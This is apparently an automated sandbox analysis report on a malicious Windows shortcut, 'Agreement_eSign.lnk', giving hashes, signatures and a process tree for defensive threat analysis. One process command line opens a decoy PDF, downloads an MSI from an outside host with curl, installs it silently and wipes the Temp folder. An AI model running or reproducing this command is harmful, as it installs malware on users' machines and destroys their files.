Analysis
max time kernel: 120s
max time network: 121s
platform: windows7_x64
resource: win7-20240729-en
resource tags: arch:x64, arch:x86, image:win7-20240729-en, locale:en-us, os:windows7-x64, system
submitted: 24-12-2024 17:19
Static task: static1
Behavioral task: behavioral1
  Sample: Agreement_eSign.lnk
  Resource: win7-20240729-en (windows7-x64)
  3 signatures, 150 seconds
Behavioral task: behavioral2
  Sample: Agreement_eSign.lnk
  Resource: win10v2004-20241007-en (windows10-2004-x64)
  23 signatures, 150 seconds
General
Target: Agreement_eSign.lnk
Size: 3KB
MD5: 1e98bde2c12668b383a15f66d71f6d0c
SHA1: b0a96f44ca8109492285657118f35551c3266794
SHA256: 1703be0db351262d9a327e98aa9df4fd33ff58b41c7ea0c7eb4587853e2cca0f
SHA512: fa30834bbd5711a7d1a454b427a1d314697dbef43adaf87ec32c54500c414af16df91ef2d462a2aa9f384a069b2bfb76f7a81c7a8726132f39fb211976caa17a
Score: 7/10
Malware Config
Signatures
Deletes itself (1 IoCs)
  pid 2864, process cmd.exe
Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
Suspicious use of WriteProcessMemory (3 IoCs)
  description | pid | process | procid_target
  PID 2188 wrote to memory of 2864 | 2188 | cmd.exe | 31
  PID 2188 wrote to memory of 2864 | 2188 | cmd.exe | 31
  PID 2188 wrote to memory of 2864 | 2188 | cmd.exe | 31
Processes
1. C:\Windows\system32\cmd.exe
   Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\Agreement_eSign.lnk
   Signatures: Suspicious use of WriteProcessMemory
   PID: 2188
   2. C:\Windows\System32\cmd.exe (child of PID 2188)
      Command line: "C:\Windows\System32\cmd.exe" /k start msedge https://www.wto.org/english/docs_e/legal_e/27-trips.pdf & curl -sLo C:\Users\Admin\AppData\Local\Temp\82b377b2-9644-47c3-993b-d84cfb887a43.msi http://us5.info/upl/install.msi & C:\Users\Admin\AppData\Local\Temp\82b377b2-9644-47c3-993b-d84cfb887a43.msi /qn & del /q/f/s C:\Users\Admin\AppData\Local\Temp & exit
      Signatures: Deletes itself
      PID: 2864